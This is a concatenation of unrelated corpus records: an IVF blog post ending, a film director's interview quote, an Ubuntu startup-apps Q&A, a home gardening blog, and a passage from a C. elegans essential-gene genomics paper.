this time, my estrogen decided not to cooperate and we had a nerve-wracking few weeks as we faced dose changes and the possible cancelled cycle. Because nothing about this journey was ever smooth sailing, right? But we flew back to Texas and the last lab work showed my labs to (finally) be in normal range. We found out 6 of the 8 eggs fertilized. To be honest, this scared me a bit, losing two. We needed all we could get. The night before transfer, we drove to Galveston with Celina and and her baby to spend my bed rest in a beach house along the ocean. Transfer the next morning revealed a very happy doctor, two early blasts and a sobbing Risa. He told us there was a morula that could possibly make it to blast to be able to freeze. For the first time, since maybe the first IVF, I was so happy I could burst. There seemed to finally be a silver lining. I had already started my Lovenox protocol, so that would hopefully prevent my blood from clotting (another thing MTHFR may be responsible for). The next day, while on my bed rest couch across from Celina, I found out not only did the third embryo make it to blast, but two others of the original six caught up and one was a hatching blast. We had three embryos to freeze and two almost perfect blasts snuggling in inside me and even now, I sit here crying when I think of how much we’ve struggled and how everything in our journey led up to this. We flew home at the end of March and on 3/31, I got my positive on a generic test. On April 8th, 14dp5dt, my beta was 564! Then 1,224! Then 3,655! On April 14, we saw one GS and one yolk sac and at 6 weeks, we saw a fetal pole with a HR of 111. I was released from the Texas clinic at 12 weeks and today I am 16w4d. I’ve had no bleeding, no cramping and it’s more than I could have ever asked for. And now I’m sitting here, crying, because this journey has been so shitty and heartbreaking and now I have this miracle inside me, squirming around and waving and making me nauseous and I know it’s cliché but I never thought this day would come. I’m continuing to take it day by day and so thankful for that crazy idea of flying to Texas and meeting Celina in person and snatching that donor and her last 8 frozen eggs. I look back at my infertility time line and I laugh so hard when I think of how my Husband were debating when to do our first IUI to make sure it didn't conflict with a vacation, because it was going to be as easy as scoring on the first treatment… *hugs* what an amazing journey!! I'm so happy for you that you're finally at this point in your pregnancy Vote Up0Vote Down Reply 2 years ago Welcome! Hey there! I’m Risa, author of this website. I’m an RN turned freelance writer and personal blogger passionately writing about motherhood, infertility, and health. You can email me with any questions at [email protected]. Get exclusive content by subscribing Like what you see? I send out a newsletter twice a month with my latest blogs posts, insider info, and updates on giveaways!
null
minipile
NaturalLanguage
mit
null
“In the house, it was important that they have bits and pieces of the culture, but it wasn’t over the top and stereotypical. My parents’ home had a mix of Western things, and things that were more Pakistani-American, or religiously-influenced. So, the production design was important for that. But also Hala’s clothing. She needed to look like a modern teenager, and I didn’t want her to stand out so much that we are thinking that she’s an other. She’s not. It’s that these are multiple identities. Because she lives in America, of course she’s going to be influenced by American fashion, [like] the way she wears her sneakers — even the way she wears her hijab. Sometimes it’s messy, and it’s not perfect because she’s a teenager, and she’s in a rush, and she’s got places to be. In her room, she has the prayer rug and sometimes it’s out and she’s praying on it, and sometimes it’s stowed away. But her room is also like any other teenage girl’s. All those things were important when I would talk to the heads of departments, to make sure it all feels like everything you place in the rooms, everything they wear, has to feel like it has a story, and it came from somewhere real.”
null
minipile
NaturalLanguage
mit
null
Q: How to add Nitrotasks to startup applications in Ubuntu 12.10? Always, when I want to add an application to startup, I use system monitor to find run-command and then add it to startup. But in Nitrotaks case the run-command is "/usr/bin/python/opt/nitro/bin/nitrotasks" and when I add it, doesn’t work. I've checked "nitrotasks" too. What do you suggest me ? A: To add an application to start-up applications, just type start in Dash, and click on Startup Applications. Once you click on it, and the new window opens, click on add to add you desired application. A window will open asking for the apps info. Once you're done filling out all the information, click on Add, and you're done.
null
minipile
NaturalLanguage
mit
null
This year my goal is to grow 2,000 pounds of fresh fruits and vegetables. I think I can do it. With 16 raised garden beds, a greenhouse, a raspberry patch and a few more planting beds sprinkled throughout our property, I think growing 2,000 pounds of food is an attainable goal. Even if I do live right in the middle of high maintenance suburbia. Sweet potato slips were planted this week. This is our first year growing them. If you have any advise about growing sweet potatoes I should know about, please leave a comment below. ♥Mavis ~~~~~~~~~~~~~~~~~~~ I have spent a total of $$414.90 on seeds, soil, plants and supplies for this year. This year my goal is to grow 2,000 pounds of fresh fruits and vegetables. I think I can do it. With 16 raised garden beds, a greenhouse, a raspberry patch and a few more planting beds sprinkled throughout our property, I think growing 2,000 pounds of food is an attainable goal. Even if I do live right in the middle of high maintenance suburbia. I believe people have lost touch with what the term “fresh produce” really means. Fresh produce is not something that has been flown in from 1,500 miles away and has been sitting on a grocers shelf for five days. The true meaning of “fresh produce” in my opinion, is walking out your back door and harvesting your own food. Real food does not come in a box nor does it need an ad campaign. Real Food does not come with a rebate, or an incentive to buy. One bite of an heirloom tomato on a warm summers day is all the convincing you’ll need to keep coming back for more. Real food will sell itself, hands down, any day of the week. ~~~~~~~~~~~~~~~~~~~ I have spent a total of $412.40 on seeds, soil, plants and supplies for this year. Today was the first day since I began my little adventure/wish of trying to grow 2,000lbs of garden produce that I thought I might actually be able to do this, like for real. Sure I’ve had a garden before, but were talking a few tomato, cucumber, pumpkin and maybe bean plants. Nothing like what I’ve got going on this year. Not even close. I started the day by harvesting 6lb 10 oz. of shelling peas, checked in on the chickens, then went down to my neighbor’s yard (who’s moving tomorrow) and planted her 4 garden boxes with beans, carrots, squash, radish, and 18 cabbage. I’ll be going back in a few more days to plant the parsnips. I know I’m taking a bit of a gamble with planting in her backyard boxes because if her house sells before I can harvest…. well let’s just say the new homeowners will be picking their own dinner. I was able to harvest 1lb 4 oz of sage and 12oz of oregano from her herb box {she was going to pull them out if I wasn’t going to use it} and then came home and washed and bundled up the herbs for drying. I was also able to pick a few strawberries and 1lb 6 oz of wild salmon berries as well. All in all, a good day. I’m beginning to think that if I had to grow all our food we would starve to death. Today’s harvest? 2 oz radish, 2 oz lettuce and 1 oz broccoli. Maybe growing 2,000lbs of garden produce is going to be harder that I thought. This post may contain affiliate links. These affiliate links help support this site. For more information, please see my disclosure policy. Thank you for supporting One Hundred Dollars a Month. Yippee! Something else for me to plant! The seed potatoes arrived today from Seed Savers. I like surprises so I ordered the 20lb sampler. I don’t know if I’m more excited about the potatoes or the cute little muslin bags they came in. I can’t wait to re-use them. I received 2.5lbs of each of the following varieties: All Blue, Yukon Gold, La Ratte, Purple Viking, Kerr’s Pink, Red Gold, All Red & Austrian Crescent. I’ll keep you posted on how they grow! This post may contain affiliate links. These affiliate links help support this site. For more information, please see my disclosure policy. Thank you for supporting One Hundred Dollars a Month.
null
minipile
NaturalLanguage
mit
null
Background {#Sec1} ========== Essential genes are absolutely required for the viability of an organism such that loss of function mutation in essential genes will lead to lethality or unviable progeny \[[@CR1], [@CR2]\]. Recent research has shown that essential genes are associated with human diseases and conditions such as miscarriages \[[@CR3], [@CR4]\] and cancers \[[@CR5]--[@CR7]\]. The discovery of many important essential genes, such as *let-60/Ras* \[[@CR8]\] and *let-740/dcr-1* \[[@CR9], [@CR10]\], were attributed to the use of model organism *Caenorhabditis elegans*, in which essential genes is estimated to take up 25% of all the genes \[[@CR11]--[@CR13]\]. In mammals, approximately one-third of all mammalian genes are essential for life \[[@CR14]\]. Due to the importance of essential genes, large scale efforts have been undertaken to identify the complete set of essential genes and to understand their function. For instance, 3326 murine genes were identified to be essential upon knockout, which accounts for 14% of the murine genome \[[@CR14], [@CR15]\]. Many of the essential genes in mice are enriched in human disease genes \[[@CR7], [@CR15]\], such as cardiovascular (GATA4), neoplasms (KLF6), and nervous system (HOXA1). Similar large-scale loss-of-function studies is also available for several other model organisms including *Saccharomyces cerevisiae* \[[@CR16], [@CR17]\], *Schizosaccharomyces pombe* \[[@CR18]\], *Drosophila melanogaster* \[[@CR19]--[@CR24]\], and *Danio rerio* \[[@CR25], [@CR26]\]. In *C. elegans*, RNAi knock-down phenotypes were examined for roughly 92% of the *C. elegans* genes and about 3500 genes (\~ 17%) have been annotated as essential \[[@CR13], [@CR27], [@CR28]\]. While RNAi was successful in applying genome-wide targeted approach to identify genetic phenotypes, it is limited to only knock-down gene expression instead of fully knock-out gene expression and are unable to maintain the phenotype over longer periods of time \[[@CR13], [@CR29]\]. The best approach is by mutagenesis and screen for gene knock-outs. The concerted effort in the *C. elegans* Deletion Mutant Consortium along with the Million Mutation Project has generated loss-of-function alleles in 13,760 of 20,514 protein-coding genes \[[@CR30]\]. The great majority of the mutants from the above resources, however, are largely non-lethal mutations as their approach requires the mutant strain to propagate \[[@CR30]\]. An effectively way to screen and maintain lethal mutations is to use genetic balancer systems \[[@CR31]\]. Nearly 70% of the *C. elegans* genome is balanced by genomic rearrangements such as duplications, translocations, and inversions \[[@CR31], [@CR32]\]. Duplication balancers do not cross-over with normal chromosomes and thereby providing a third allele that carries the wildtype rescuing allele \[[@CR31]\]. The large chromosomal duplications are not replicated and they segregate in a non-Mendelian fashion such that it is not pass down to daughter cells equally in meiosis. The progeny inheriting the duplication will survive while the progeny without the duplication will not. Previous genetic studies have identified 103 essential genes mapped to 5.4 Mb region of Chromosome I balanced by the duplication *sDp2* \[[@CR33]\]. We have previously combined the mapping data with next generation sequencing to identify the molecular identities of many essential genes but many more are still uncharacterized \[[@CR27]\]. Many studies have suggested that genes are not randomly disturbed in the genome. For instance, the chromosomal clustering of housekeeping genes \[[@CR34]\] and the distribution biases of the sex-regulated genes \[[@CR35]\] can be found in the genome. Recent technological advances in chromatin-conformation capture methods have allowed in-depth study of genome organization. Methods such as 3C \[[@CR36]\], 4C \[[@CR37]\], Hi-C \[[@CR38]\], and ChiA-PET \[[@CR39], [@CR40]\] examines genomic fragments that are close in proximity in nuclear space and have been successfully applied to bacteria \[[@CR41]--[@CR43]\], yeast \[[@CR44]--[@CR46]\], *Plasmodium falciparum* \[[@CR47]\], plants \[[@CR48], [@CR49]\], *C. elegans* \[[@CR50], [@CR51]\], fruit fly \[[@CR52], [@CR53]\], mouse \[[@CR54], [@CR55]\], and humans \[[@CR38], [@CR55]--[@CR57]\]. By crosslinking genomic fragments that are close in space followed by high-throughput sequencing, Hi-C is able to identify the loci that are close in space but not necessarily close in genomic coordinates \[[@CR38], [@CR57]--[@CR59]\]. The chromatin interactions in the genome can form domains called topologically associating domains, or TADs, which are megabase-pair size regions where intra-chromatin interactions occur more frequently than other chromatin regions \[[@CR55], [@CR60]\]. TADs share a high degree of similarity in the domain organization across different cell types and are conserved between mice and humans, suggesting that TADs are the stable domain organization in mammalian genomes \[[@CR55]\]. Functionally related genes showed higher clustering on the chromosomes \[[@CR61]\] and may be linked in their gene expression regulation. Functionally linked genes, including co-expressed genes, genes in common pathway, or genes with protein-protein interaction exhibit higher clustering on chromosomes in both *Escherichia coli* and humans \[[@CR62], [@CR63]\]. TAD boundaries, defined as genomic region between TADs, are abundant in transcription start sites, active transcription, active chromatin marks, housekeeping genes, and tRNA genes \[[@CR55]\]. These findings inspired us to consider whether genes with same essentiality or co-expression genes have some spatial localization features and whether essential genes show enrichment in TAD boundaries. Results {#Sec2} ======= Identification of genomic mutations in 130 chromosome I mutants {#Sec3} --------------------------------------------------------------- Genomic DNA libraries of 130 mutant strains (Additional file [1](#MOESM1){ref-type="media"}) with *dpy-5 (e61)* and *unc-13 (e450)* balanced by *sDp2* were prepared and sequenced using Illumina HiSeq to generate 100 bp paired end reads. We achieved an average sequencing depth of 23X across the whole genome and an average depth of 28X in coding regions. The *dpy-5 (e61)* and *unc-13* (*e450*) identified previously are used as a quality check \[[@CR27]\]. For *unc-13*, the variant ratio is expected to be 100% because the *sDp2* does not balance that allele. For *dpy-5*, a 66% variant ratio is expected because the *sDp2* carry a rescuing allele \[[@CR27]\]. In our sequencing data, we found 23 strains without the expected *dpy-5 (e61)I* and *unc-13 (e450)I* mutation and they were removed from further analysis. In the case of 4 strains where there is insufficient sequencing (below 8X coverage), *let-394 (h235)*, *let-545 (h842)*, *let-395 (h271)*, and *let-122 (h226)* were also removed from subsequent analyses. As a result, a total of 103 strains were analyzed. Identification of essential genes {#Sec4} --------------------------------- Improving upon a method previously adapted for identifying lethal mutations on Chromosome I balanced by *sDp2* \[[@CR27]\], we identified 58 putative lethal mutations in 103 strains. These putative lethal mutations fall into 44 genes. The full list of let genes with its identified sequences are shown in Table [1](#Tab1){ref-type="table"} and Additional file [2](#MOESM2){ref-type="media"}.Table 1Biological functions of the identified 44 essential genes*let-nameEssential geneAllelesAllele mutation (nucleic acid)Allele mutation (Protein)PfamKOGEvolutionary conservatiorlet-609let-363*h191C- \> TR- \> XPhosphatidylinositol 3- and 4-kinaseReplication, recombination and repairI,F,M,N*let-643nath-10*h500G- \> AR- \> KGNAT acetyltransferase 2General function prediction onlyI,F,M,N*let-624/ let-644/ let-622npp-6*h449,h839,h222C- \> TQ- \> XNucleoporin Nup120/160UnkownI,F,M,N*let-610asd-2*h695C- \> TP- \> SHomodimerisation region of STAR domain proteinRNA processing and modificationI,F,M,N*let-639/ let-371hcp-6*h779,h123G- \> AW- \> Xnon-SMC mitotic condensation complex subunit 1Function unknownI,F,M,N*let-138/ let-150/ let-357spg-7*h744,h282,h89G- \> AW- \> XPeptidase family M41Posttranslational modification, protein turnover, chaperonesI,F,M,N*let-163sep-1*h483C- \> TQ- \> XPeptidase family C50Cell cycle control, cell division. Chromosome partitioningF,M,N*let-133Y71G12B.8*h440T- \> AY- \> XDEAD/DEAH box helicaseRNA processing and modificationI,F,M,N*let-593inx-13*h212C- \> TQ- \> XInnexinUnkownI,F,N*let-625rpl-4*h506G- \> AD- \> NRibosomal protein L4/L1 familyRNA processing and modificationI,F,M,N*let-633/ let-638B0261.1*h696,h778C- \> TR- \> XMyb DNA-binding likeTranscriptionI,F,M,N*let-648vha-16*h781G- \> AD- \> NUnkownUnkownI,N,M,F*let-615rpl-13*h529C- \> TQ- \> XRibosomal protein L13eTranslation, ribosomal structure and biogenesisI,F,M,N*let-356cdc-6*h501G- \> AG- \> RATPase family associated with various cellular activities (AAA)Cell cycle control, cell division. Chromosome partitioning;Replication, recombination and repairI,F,M,N*let-505tufm-2*h426C- \> TR- \> XElongation factor Tu GTP binding domainTranslation, ribosomal structure and biogenesisI,F,M,N*let-128C53H9.2*h253465 + 1G \> ANone50S ribosome-binding GTPaseGeneral function prediction onlyI,F,M,N*let-398gpc-2*h257C- \> TQ- \> XGGL domainSignal transduction mechanismsI,F,M,N*let-619/ let-105dip-2*h348,h681C- \> TH- \> YAMP-binding enzymeGeneral function prediction onlyI,F,M,N*let-649/ let-109him-1*h491,h811G- \> AG- \> RRecF/RecN/SMC N terminal domainCell cycle control, cell division. Chromosome partitioningI,N,M,F*let-578npp-11*h512G- \> AW- \> XNucleoporin FG repeat regionIntracellular trafficking, secretion, and vesicular transport;Nuclear structureI,F,M,N*let-543/ let-544sacy-1*h792,h692G- \> AG- \> RDEAD/DEAH box helicaseRNA processing and modificationI,F,M,N*let-614rmh-1*h147C- \> TS- \> LRecQ mediated genome instability proteinFunction unknownF,N*let-582egg-4*h726G- \> AA- \> TProtein-tyrosine phosphataseSignal transduction mechanismsI,F,M,N*let-528cytb-5.2*h1012G- \> AW- \> XCytochrome b5-like Heme/Steroid binding domainEnergy production and conversionI,F,M,N*let-511W09C3.4*h755262-1G \> ANoneRNA polymerase Rpc34 subunitTranscriptionI,F,M,N*let-135pop-1*h268G- \> AA- \> THMG (high mobility group) boxTranscriptionI,F,M,N*let-502spe-5*h767C- \> TS- \> FATP synthase alpha/beta family, nucleotide-binding domainEnergy production and conversionI,F,M,N*let-143npp-13*h513G- \> AG- \> ENup93/Nic96Cell cycle control, cell division. Chromosome partitioningI,F,M,N*let-571eif-2gamma*h347G- \> AG- \> RInitiation factor eIF2 gamma, C terminalTranslation, ribosomal structure and biogenesisI,F,M,N*let-155inx-21*h461C- \> TR- \> XInnexinUnkownI,F,N*let-162Y47G6A.18*h460G- \> AG- \> EGolgi phosphoprotein 3 (GPP34)Intracellular trafficking, secretion, and vesicular transportI,F,M,N*let-510Y47G6A.19*h7401355-1G \> ANoneZinc carboxypeptidaseFunction unknownI,F,M,N*let-357lpd-3*h1321539 + 1G \> ANoneFragile site-associated protein C-terminusUnkownI,F,M,N*let-546xpo-2*h227G- \> AW- \> XCse1Intracellular trafficking, secretion, and vesicular transport;Nuclear structureI,F,M,N*let-121/ let-146cdt-1*h810,h197C- \> TQ- \> XDNA replication factor CDT1 likeUnkownI,F,M,N*let-130lpr-1*h773G- \> AR- \> QUnkownUnkownF,N*let-573rpl-1*h247C- \> TT- \> IRibosomal protein L1p/L10e familyTranslation, ribosomal structure and biogenesisI,F,M,N*let-145arx-1*h182C- \> TQ- \> XActinCytoskeletonI,F,M,N*let-123/ let-142/ let-583cogc-3*h413,h518,h738G- \> AG- \> RSec34-like familyIntracellular trafficking, secretion, and vesicular transportI,F,M,N*let-577sop-3*h503G- \> AE- \> KUnkownUnkownF,M,N*let-548/ let-144tln-1*h356,h393C- \> TQ- \> XTalin, middle domainCytoskeletonI,F,M,N*let-131Y71G12B.6*h817C- \> TQ- \> XGDP-mannose 4,6 dehydrataseUnkownF,N*let-392nekl-2*h120,h122G- \> AG- \> EProtein kinase domainGeneral function prediction onlyF,M,N*let-374lpd-5*h251G- \> AW- \> XUnkownUnkownI,F,M,NTable includes 44 identified essential genes in this study with the information of *let-x* name, Alleles, Allele mutation, biological functions, and evolutionary conservation. N-Nematodes, I-Invertebrates (*Drosophila*), M-Mammals (mouse, human), F-Fungi (*Saccharomycetaceae*) Novel essential genes identified {#Sec5} -------------------------------- Of the essential genes we have identified, we found 6 new putative essential genes in which no other knock-out alleles have been generated. Of these 6 genes, *let-633/let-638* (B0261.1) is orthologous to a novel Myb-like leucine zipper transcription factor, which is necessary for cell proliferation, apoptosis, and differentiation, and plays an important role in the pathogenesis of adenoid cystic carcinoma \[[@CR64]--[@CR66]\]. *let-128* (C53H9.2) is orthologous to 50S ribosome-binding GTPase, as previously research show many *Escherichia coli* GTPases are important in ribosome biogenesis \[[@CR67]\]. Mitomycin C induced mutations in this gene also shows this gene as essential for survival \[[@CR68]\]. *let-511* (W09C3.4) is orthologous to RNA polymerase Rpc34 subunit, which plays a key role in the recruitment of RNAP III to the pre-initiation complex \[[@CR69], [@CR70]\]. *let-162* (Y47G6A.18) is orthologous to the Golgi phosphoprotein 3, which is a peripheral membrane protein of the Golgi stack and plays a regulatory role in Golgi trafficking \[[@CR71]\]. *let-510* (Y47G6A.19) is orthologous to zinc carboxypeptidase, which plays a role of protease enzyme that hydrolyzes peptide bonds at the carboxy-terminal end of a protein or peptide. *Let-131* (Y71G12B.6) is orthologous to GDP-mannose 4,6 dehydratase, which is essential in the first step of GDP-fucose biogenesis pathway \[[@CR72]\]. Functions of the identified 44 essential genes {#Sec6} ---------------------------------------------- To understand the biological roles of essential genes, we first examined the functions of the 44 essential genes identified in this study based on their orthologous genes (Table [1](#Tab1){ref-type="table"}). Among the 44 genes, 13 essential genes encode enzymes, such as 50S ribosome-binding GTPase, RNA polymerase Rpc34 subunit, ATP synthase alpha/beta family, protein-tyrosine phosphatase, and nucleotide-binding domain. We found 5 genes related to ribosome biology and biogenesis (Additional file [3](#MOESM3){ref-type="media"}. column: KEGG). Twelve essential genes were found to be involved in protein metabolic processes (Additional file [3](#MOESM3){ref-type="media"}). Considering that the biological roles of essential genes is very important, essential genes are often conserved across different species. We investigated the orthologs of these essential genes in other nematodes (N), Invertebrate (I) (*D. melanogaster*), Mammals (M) (mouse and human), and Fungi (F) (of the family *Saccharomycetaceae*) as shown in Table [1](#Tab1){ref-type="table"}. We found that 35 of 44 (79.5%) essential genes were conserved in all the examined organisms. Three of the genes were found to be essential in fungi and nematodes, such as *let-30/lpr-1*, a required gene at a time of rapid luminal growth expressed by the duct, pore and surrounding cells \[[@CR73]\]. Three genes were found in nematodes, fungi, and mammals, such as, *let-163/sep-1* is a member of peptidase family C50*,* encodes the *C. elegans* ortholog of separase, a cysteine protease first discovered in yeast, *sep-1* activity is required for a number of cell cycle events including sister chromatid separation and membrane trafficking \[[@CR28]\]. We found two genes specific to invertebrates, which were conserved in nematodes, fungi, and invertebrates, but not in mammals. For instance, *let-593/inx-13* encodes an innexin, which is an essential transmembrane channel protein and involved in the building of invertebrate gap junctions. Gene essentiality analysis {#Sec7} -------------------------- To conduct gene essentiality analysis, four groups of genes were used for comparison: Group one (G1): essential genes that were isolated through genetic screens and are fully sequenced and analysed by high throughput methods dependent on the use of allelic ratios \[[@CR27], [@CR33], [@CR74]\] (82 in total). Group two (G2): essential genes that have published alleles or RNAi supporting lethal phenotypes in the region of chromosome I balanced by *sDp2* (366 in total). Group three (G3): essential genes that have published alleles or RNAi supporting lethal phenotypes (3083 in total). Group four (G4): non-essential genes that have no observable lethal phenotypes caused by either RNAi or known alleles (16,018 in total). We compared the function of essential genes from four groups based on GO annotations (Cellular Component, Biological Process, and Molecular Function) and PANTHER Protein Classification (Fig. [1](#Fig1){ref-type="fig"}).Fig. 1The heat map analysis for the significant conserved gene functions based on PANTHER Overrepresentation Test. The hierarchal cluster diagram was constructed by using pheatmap clustering in R. The *P*-values of each annotation data set (**a**) Molecular Function, (**b**) Biological Process, (**c**) Cellular Component, and (**d**) PANTHER Protein Class) are calculated with the Bonferroni correction for multiple testing by each functional group, which reflect the significance of the difference for the enrichment value between the essential and nonessential genes. The red boxes represent that the functional group are overrepresentation, while the blue boxes represent the opposite case. Conversion *P*-value to -log10 (x), and get the heatmap of the converted *p*-value, the conversion value is thought to be 0 while the *P*-value is greater than 0.05, the conversion value is thought to be 10 while the *P*-value is less than 0.0000000001 For the Molecular Function annotation analysis, genes from G1, G2, and G3 do not show significant difference in any Molecular Function annotation. However annotations such as catalytic activity (GO:0003824) (*P-value* = *4.77e*^*− 17*^) and pyrophosphatase activity (GO:0016462) (*P-value* = *1.27e*^*− 8*^) are significantly underrepresented in G4 (Fig. [1](#Fig1){ref-type="fig"}a). This is consistent with our observation in the cellular component analysis, in which annotations of the intracellular (GO:0005622) (*P-value* = *2.74e*^*− 132*^), protein complex (GO:0043234) (*P-value* = *4.40e*^*− 70*^), and macromolecular complex (GO:0032991) (*P-value* = *6.47e*^*− 129*^) are overrepresented in G3 (Fig. [1](#Fig1){ref-type="fig"}b). With regard to the biological processes, essential genes in G3 are significantly enriched for cellular process (GO:0009987) (*P-value* = *6.06e*^*− 99*^), as well as nitrogen compound metabolic process (GO:0006807) (*P-value* = *1.28e*^*− 80*^) and nucleobase−containing compound metabolic process (GO:0006139) (*P-value* = *4.69e*^*− 133*^), suggesting that essential genes tend to be involved in protein synthesis. In contrast, G4 protein products are significantly enriched for the regulation of system process (GO:0003008) (*P-value* = *4.65e*^*− 5*^), such as sensory perception (GO:0007600) (*P-value* = 3.90*e*^*− 5*^), neurological system process (GO:0050877) (*P-value* = 2.06*e*^*− 4*^), and multicellular organismal process (GO:0032501) (*P-value* = 1.52*e*^*− 4*^). If there are disruptions in these processes, *C. elegans* might show mutant phenotypes, which however, are most likely not lethal. According to PANTHER Protein Class analysis, we found that essential genes in G3 are significantly enriched for nucleic acid binding (PC00171) (*P-value* = 3.50*e*^*− 128*^), and RNA binding protein (PC00031) (*P-value* = 9.97*e*^*− 113*^). All in all, the above analysis suggests that essential genes plays a key role in enzyme and nucleic acid binding activities during fundamental processes, such as DNA replication, transcription, and translation. Gene essentiality vs. gene cluster {#Sec8} ---------------------------------- It has been noted before that gene essentiality, evolutionary conservation, interaction networks, and gene expression are biological factors that can influence the structural features of proteins \[[@CR75]\]. Thus, we decided to assess the properties of essential genes between the 4 groups from three different perspectives: gene cluster, gene expression, and protein connectivity. Hi-C experiments aims to capture the DNA fragments that are close in spatial proximity and genes that are close in space tend to share common functionality \[[@CR62]\]. We aim to use Hi-C data to determine whether essential genes exhibit higher or lower gene cluster densities. The contact frequencies between all genes were derived from the Hi-C interacting DNA fragments of Wild-Type (N2) mixed-stage embryos of *C. elegans* \[[@CR50]\]. Then, the average contact frequencies of genes in each group were calculated. Figure [2](#Fig2){ref-type="fig"} shows genes from G2 tend to have more interaction partners than other essential/ non-essential genes. We observed that genes from G2 tend to have more interaction partners than G1 (*P-value = 3.08e*^*− 2*^*,* Mann-Whitney U test), which means the essential genes, sequenced and analysed by our high throughput method, tend to have less interaction partners than the other essential genes in the region of chromosome I balanced by *sDp2*. Genes from G2 also have more interaction partners than G3 (*P-value = 1.62e*^*− 4*^*,* Wilcoxon Rank Sum test), which might be due to fact that G2 essential genes are enriched in in cell cycle control, transcriptional regulation, and RNA processing \[[@CR27]\]. G2 also have more interaction partners than G4 (*P-value = 1.89e*^*− 2*^*,* Mann-Whitney U test), which indicates essential genes in the region of chromosome I balanced by *sDp2* tend to engage in larger gene cluster than to non-essential genes. However, we do see that G4 tend to have more interaction partners than G3 (*P-value = 6.10e*^*− 8*^*,* Wilcoxon Rank Sum test), suggesting non-essential genes tend to engage in larger gene cluster than to essential genes in general.Fig. 2The cluster frequency of different group genes in mixed-stage embryos *C. elegans*. Box plots of each group genes for gene interactions frequency. The numbers on the right side of the yellow block represent the average interactions frequency of genes in each group. The *P*-values were obtained from the Mann-Whitney U test / the Wilcoxon rank sum test after the Levene's test Gene essentiality vs. TAD boundaries and gene expression {#Sec9} -------------------------------------------------------- TAD boundaries are enriched in transcription start sites, active transcription, active chromatin marks, housekeeping genes, tRNA genes, short interspersed nuclear elements (SINEs), as well as binding sites for architectural proteins like CTCF and cohesin \[[@CR55], [@CR76]--[@CR79]\]. To test whether essential genes tend to cluster in TAD boundaries, we examined the genes in each group and its association with TADs. Figure [3](#Fig3){ref-type="fig"} shows G4 has higher probability than G3 to be in TAD boundaries (*P-value = 8.33e*^*− 3*^*, Fisher's exact test*) and seems that more essential gene tend to locate within TAD domains instead of at the boundaries. The fact that essential genes are not enriched in TAD boundaries suggest that essential genes expression may not be constitutively expressed like most house-keeping genes. Indeed, when we examined the gene expression of essential genes using weighted correlation network analysis (WGCNA) over 23 developmental stages, we found that essential genes are expressed in specific time frames with most of the essential genes show strong expression in early development (Fig. [4](#Fig4){ref-type="fig"}).Fig. 3The percentage of different essentiality genes locate in TAD boundaries. The four groups are labelled in black, red, green, and blue, respectively. Statistical difference was calculated for G1 vs. G2, G3, and G4 individually by using Fisher's exact test (\* *P*-value \< 0.05, \*\* *P*-value \< 0.01, \*\*\* *P*-value \< 0.001)Fig. 4The Gene expression: This figure represents the normalized transcript level (read number per coding length per million reads) for each gene across the developmental stages including 18 embryo stages, four larval stages (L1-L4), and young adult. To facilitate comparison, we subtract each gene expression values in different periods from the average value of the gene expression in different periods. The heatmap represents normalized transcript level from high (pink) to low (skyblue). Eight distinct modules that are based on their expression pattern are shown by colored modules. Yellow, Turquoise, Red, Purple, Blue, and Black: early-embryonic; Magenta: early- and mid-embryonic; Tan and Brown,: mid-embryonic; Green: late-embryonic; Greenyellow: early-, mid- and late-embryonic; Pink: larval Gene essentiality vs. protein connectivity {#Sec10} ------------------------------------------ We hypothesize that essential genes will have more protein-protein interactions than to non-essential genes due to its functional importance. Figure [5](#Fig5){ref-type="fig"} shows the distribution of the number of protein-protein interactions. Proteins from G4 tend to have less interaction partners than G3 (*P-value \< 2.20e*^*− 16*^*,* Wilcoxon Rank Sum test), suggesting that essential genes tend to be protein interaction hubs. Similar results are seen for G1 (*P-value \< 2.20e*^*− 16*^*,* Wilcoxon Rank Sum test) and G2 (*P-value \< 2.20e*^*− 16*^*,* Wilcoxon Rank Sum test) in comparison with G4.Fig. 5The protein interaction frequency of different group genes. Interaction number distribution of each group with whole genome protein interactions in *C. elegans*. Box plots of each group for protein interaction frequency. The numbers on the right side of the yellow block represent the average interaction frequency of proteins in each group. The *P*-values were obtained from the Mann-Whitney U test / the Wilcoxon rank sum test after the Levene's test Discussion {#Sec11} ========== Using genetic mapping, Illumina sequencing, and bioinformatics analyses, we successfully identified 44 essential genes with 130 lethal mutations in genomic regions of *C. elegans* of around 7.3 Mb from Chromosome I (left). From the 44 essential genes we have identified, we found 6 new predicted essential genes. As a result of our study, the total essential genes identified in the region covered by *sDp2* is now 82. High-throughput sequencing of balanced lethal mutations has proved that it is more efficient and cost-effective than the traditional method, which undertakes dozens of Sanger sequencing of genes in a particular genetic mapping zone. Depending on the size of the mapped zone, traditional method can take months or years to characterize one allele. Essential genes are important for the viability of an organism and can play a key role in novel drug development \[[@CR1], [@CR2]\]. With approximately 60% of the essential genes showing human orthologs, *C. elegans* is also an important multi-cellular animal for the study of human disease \[[@CR27]\]. While knock-out collection, targeted KO by CRISPR/Cas9 system, and RNAi screens steadily increased genomic coverage to genome scale \[[@CR13], [@CR31], [@CR80]--[@CR82]\], identifying essential genes in an intact multicellular organism are still limited in terms of recovery and maintenance of lethal mutations \[[@CR27], [@CR33]\]. Therefore, a resource such as described here for identifying and studying essential genes in model organisms is an important genetic resource for understanding organization and function of essential genes as well as providing a platform for in-depth functional studies. The functions of essential genes vary greatly and spread across many pathways. GO term analysis and PANTHER Protein Class analysis indicates that essential genes play a key role in enzyme, protein complex, cellular process and nucleic acid binding activities during fundamental processes, such as DNA replication, transcription, and translation. However, non-essential genes are significantly enriched for the regulation of system process, such as sensory perception, neurological system process, and multicellular organismal process. Previous reports have shown that essential genes in the left half of chromosome I in *C. elegans* function in cell cycle control, transcriptional regulation, and RNA processing \[[@CR33]\]. Our study here increased the number of essential genes identified in Chromosome I and further strengthens the notion that DNA replication, transcription, and translation are enriched in this set. We found that non-essential genes form larger gene clusters than essential genes in general. Non-essential genes can experience gene duplication during evolution more often than essential genes resulting in paralogs cluster in the linear genome as well as 3D chromatin architecture \[[@CR83], [@CR84]\]. This may explain why non-essential genes form larger gene clusters in general. The observation that essential genes in left half of Chromosome I form larger gene clusters than non-essential genes is intriguing. Functionally linked genes, including co-expressed genes, protein-protein interaction genes, and genes in the same pathway cluster together in physical proximity in *Escherichia coli*, *C.elegans* and humans \[[@CR62], [@CR63], [@CR85]\]. From the gene expression analysis, we observed that majority of the essential genes are expressed early in development. We hypothesize that there is a common expression regulation facilitated by the chromatin 3D structure. This notion is consistent with our observation that essential genes tend to locate within TAD structures rather than at TAD boundaries. Studies in *Caulobacter crescentus* shows that highly expressed genes are enriched in the boundaries of chromosomal interaction domains 